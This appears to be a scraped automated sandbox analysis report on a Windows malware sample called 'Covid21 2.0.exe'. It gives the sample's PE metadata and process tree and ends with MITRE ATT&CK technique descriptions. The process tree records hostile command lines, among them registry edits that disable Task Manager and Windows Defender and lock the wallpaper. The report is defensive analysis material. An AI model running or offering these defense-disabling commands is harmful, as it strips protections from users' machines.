IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x1a5000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1	0x1a6000	0xf6000	0xf5600	False	0.999160245797	data	7.99978608598	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x29c000	0x33000	0x32200	False	0.41157360505	data	4.64567241992	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x29c250	0x31828	data
RT_RCDATA	0x3da74	0x5a4	empty
RT_RCDATA	0x3e018	0x25a4cf	empty
RT_RCDATA	0x2984e8	0xbe	data
RT_RCDATA	0x2985a8	0xb	data
RT_RCDATA	0x2985b4	0x6	Non-ISO extended-ASCII text, with no line terminators
RT_GROUP_ICON	0x2cda7c	0x14	data
RT_VERSION	0x2cda94	0x210	data
RT_MANIFEST	0x2cdca8	0x29c	XML 1.0 document, ASCII text, with very long lines, with no line terminators

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
COMCTL32.dll	InitCommonControls
GDI32.dll	SetBkColor
MSVCRT.dll	memset
OLE32.dll	CoInitialize
SHELL32.dll	ShellExecuteExA
SHLWAPI.dll	PathQuoteSpacesA
USER32.dll	IsChild

Version Infos

Description	Data
InternalName	covid-21
ProductName	covid21 corona virus
FileVersion	2,0,0,0
ProductVersion	2,0,0,0
FileDescription	Run this only on vm
Translation	0x0000 0x04e4

Network Behavior

No network behavior found

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: Covid21 2.0.exe PID: 5888 Parent PID: 5620

General

Start time:	15:35:18
Start date:	28/03/2021
Path:	C:\Users\user\Desktop\Covid21 2.0.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Covid21 2.0.exe'
Imagebase:	0x400000
File size:	1210880 bytes
MD5 hash:	A7C7F5E792809DB8653A75C958F82BC4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: cmd.exe PID: 4564 Parent PID: 5888

General

Start time:	15:35:19
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2870.tmp\Covid21.bat' '
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 4740 Parent PID: 4564

General

Start time:	15:35:20
Start date:	28/03/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cscript.exe PID: 4064 Parent PID: 4564

General

Start time:	15:35:20
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	cscript prompt.vbs
Imagebase:	0x9c0000
File size:	143360 bytes
MD5 hash:	00D3041E47F99E48DD5FFFEDF60F6304
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: reg.exe PID: 3164 Parent PID: 4564

General

Start time:	15:35:23
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Imagebase:	0x9c0000
File size:	59392 bytes
MD5 hash:	CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: reg.exe PID: 5984 Parent PID: 4564

General

Start time:	15:35:24
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	Reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Imagebase:	0x9c0000
File size:	59392 bytes
MD5 hash:	CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: CLWCP.exe PID: 852 Parent PID: 4564

General

Start time:	15:35:25
Start date:	28/03/2021
Path:	C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe
Wow64 process (32bit):	true
Commandline:	clwcp c:\covid21\covid.jpg
Imagebase:	0x400000
File size:	517120 bytes
MD5 hash:	E62EE6F1EFC85CB36D62AB779DB6E4EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 4%, Virustotal, Browse Detection: 8%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	low

Analysis Process: reg.exe PID: 3088 Parent PID: 4564

General

Start time:	15:35:29
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
Imagebase:	0x9c0000
File size:	59392 bytes
MD5 hash:	CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: wscript.exe PID: 1724 Parent PID: 4564

General

Start time:	15:35:30
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\x.vbs'
Imagebase:	0xf50000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 1380 Parent PID: 4564

General

Start time:	15:35:31
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /K coronaloop.bat
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6028 Parent PID: 1380

General

Start time:	15:35:31
Start date:	28/03/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: timeout.exe PID: 2420 Parent PID: 4564

General

Start time:	15:35:31
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 5 /nobreak
Imagebase:	0xb70000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: Corona.exe PID: 5424 Parent PID: 1380

General

Start time:	15:35:31
Start date:	28/03/2021
Path:	C:\covid21\Corona.exe
Wow64 process (32bit):	true
Commandline:	c:\covid21\corona.exe
Imagebase:	0x400000
File size:	531456 bytes
MD5 hash:	6374CA8AD59246DFED4794FD788D6560
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Analysis Process: inv.exe PID: 4744 Parent PID: 4564

General

Start time:	15:35:36
Start date:	28/03/2021
Path:	C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe
Wow64 process (32bit):	true
Commandline:	inv.exe
Imagebase:	0x400000
File size:	367616 bytes
MD5 hash:	EBB811D0396C06A70FE74D9B23679446
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 6%, Metadefender, Browse Detection: 48%, ReversingLabs
Reputation:	low

Analysis Process: wscript.exe PID: 4168 Parent PID: 4564

General

Start time:	15:35:37
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Imagebase:	0xf50000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: timeout.exe PID: 4692 Parent PID: 4564

General

Start time:	15:35:37
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 5 /nobreak
Imagebase:	0xb70000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: z.exe PID: 6192 Parent PID: 4564

General

Start time:	15:35:42
Start date:	28/03/2021
Path:	C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe
Wow64 process (32bit):	true
Commandline:	z.exe
Imagebase:	0x400000
File size:	422029 bytes
MD5 hash:	A7CE5BEE03C197F0A99427C4B590F4A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 7%, ReversingLabs

Analysis Process: wscript.exe PID: 6228 Parent PID: 4564

General

Start time:	15:35:43
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Imagebase:	0xf50000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 6248 Parent PID: 4564

General

Start time:	15:35:43
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 5 /nobreak
Imagebase:	0xb70000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: mlt.exe PID: 6488 Parent PID: 4564

General

Start time:	15:35:48
Start date:	28/03/2021
Path:	C:\Users\user\AppData\Local\Temp\2870.tmp\mlt.exe
Wow64 process (32bit):	false
Commandline:	mlt.exe
Imagebase:	0x400000
File size:	133205 bytes
MD5 hash:	A4E26D32F9655DBE8EFD276A530EB02B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: wscript.exe PID: 6508 Parent PID: 4564

General

Start time:	15:35:48
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Imagebase:	0xf50000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 6520 Parent PID: 4564

General

Start time:	15:35:49
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 5 /nobreak
Imagebase:	0xb70000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: wscript.exe PID: 6708 Parent PID: 4564

General

Start time:	15:35:54
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Imagebase:	0xf50000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: icons.exe PID: 6732 Parent PID: 4564

General

Start time:	15:35:55
Start date:	28/03/2021
Path:	C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe
Wow64 process (32bit):	true
Commandline:	icons.exe
Imagebase:	0x400000
File size:	107828 bytes
MD5 hash:	3CA1D5768C2944D4284B1541653823C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 13%, ReversingLabs

Analysis Process: timeout.exe PID: 6780 Parent PID: 4564

General

Start time:	15:35:56
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 5 /nobreak
Imagebase:	0xb70000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6788 Parent PID: 6732

General

Start time:	15:35:56
Start date:	28/03/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: screenscrew.exe PID: 5592 Parent PID: 4564

General

Start time:	15:36:01
Start date:	28/03/2021
Path:	C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe
Wow64 process (32bit):	true
Commandline:	screenscrew.exe
Imagebase:	0x400000
File size:	113664 bytes
MD5 hash:	E87A04C270F98BB6B5677CC789D1AD1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 36%, Metadefender, Browse Detection: 62%, ReversingLabs

Analysis Process: wscript.exe PID: 3880 Parent PID: 4564

General

Start time:	15:36:01
Start date:	28/03/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Imagebase:	0xf50000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Covid21 2.0.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Code Manipulations

Statistics

Behavior

System Behavior

Analysis Process: Covid21 2.0.exe PID: 5888 Parent PID: 5620

General

Analysis Process: cmd.exe PID: 4564 Parent PID: 5888

General

Analysis Process: conhost.exe PID: 4740 Parent PID: 4564

General

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.
Tactics:	Impact
Data Sources:	Packet capture, Packet capture, Web application firewall logs, Web logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre